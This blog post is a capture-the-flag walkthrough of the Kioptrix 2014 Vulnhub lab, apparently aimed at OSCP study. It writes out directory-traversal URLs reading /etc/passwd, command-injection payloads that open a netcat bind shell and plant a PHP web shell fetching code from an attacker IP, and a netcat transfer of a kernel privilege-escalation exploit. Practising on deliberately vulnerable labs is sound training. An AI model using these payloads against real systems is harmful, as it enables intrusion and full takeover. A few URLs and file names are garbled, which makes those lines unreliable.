SecureArmors

,

Vulnhub Series: 05

Published by

Jay

on

Kioptrix: 2014 (#5) Walkthrough  (Vulnhub| OSCP Model)

 

Step by Step process:

Taget Machine VM’s IP:
Step 1: I start by figuring out the IP address of the target Kioptrix 2014 machine. IP. Using below commands.

netdiscover -r 192.168.48.0/24

Enumeration:

Step 2:Nmap Scan to find out services
nmap -Pn -A -v 192.168.48.170

Step 3: Try to find directory and interesting files form below commands.
dirb http://192.168.48.170
nikto -h http://192.168.48.170

Step 4: After Enumeration and research for any publicly available exploits…..

Gaining Access (Exploitation):

Step 1: check Source code for any clues.

Wow, We found url in comment sections : pChart2.1.3/index.php

https://www.exploit-db.com/exploits/31173/

[1] Directory Traversal:
http://192.168.48.170/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

http://192.168.48.170/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

According to this page https://www.freebsd.org/doc/handbook/network-apache.html the httpd.conf file is here:
/usr/local/etc/apache2x/httpd.conf
ErrorLog “/var/log/httpd-error.log”
CustomLog “/var/log/httpd-access.log”

http://192.168.48.170/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

find the parameter in httpd.config file : SetEnvIf User-Agent

Mozilla/4.0 Mozilla4_browser

[2] Cross-Site Scripting (XSS):
httpp://192.168.48.170/pChart2.1.3/examples/sandbox/script/session.php?alert(‘XSS’)

Getting a shell :

PHPTAX was vulnerable to Exploit-DD public exploit:https://www.exploit-db.com/exploits/21665/

Exploit / Proof of Concept:

Bindshell on port 23235 using netcat:

http://localhost/phptax/drawimage.php?pfilez=xxx;%20nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make

** Exploit-DB Verified:**
http://localhost/phptax/index.php?pfilez=1040d1-pg2.tob;nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make

http://192.168.48.170:8080/phptax/drawimage.php?pfilez=xxx;echo%20%27%3C?php%20system($_GET%5Bcmd%5D);%20?%3E%27%20%3E%20cmd.php;&pdf=make

http://http://192.168.48.170:8080/phptax/cmd.php?cmd=fetch%20http://192.168.48.171:8100/shell.txt

Privilege Escalation:

https://www.exploit-db.com/exploits/26368/

Attacker machine:
nc -lvq 6666 < /usr/share/exploitdb/platforms/freebsd/local/26368.c

Victim shell:
nc 10.0.0.55 6666 > /tmp/exploit.c

gcc exploit2.c -o exploit2

https://www.exploit-db.com/exploits/28718/

Clean up:
Just Reset a victim machine for clean up.

Bingo, :–).. Got root Shell

Leave a comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Previous Post
Next Post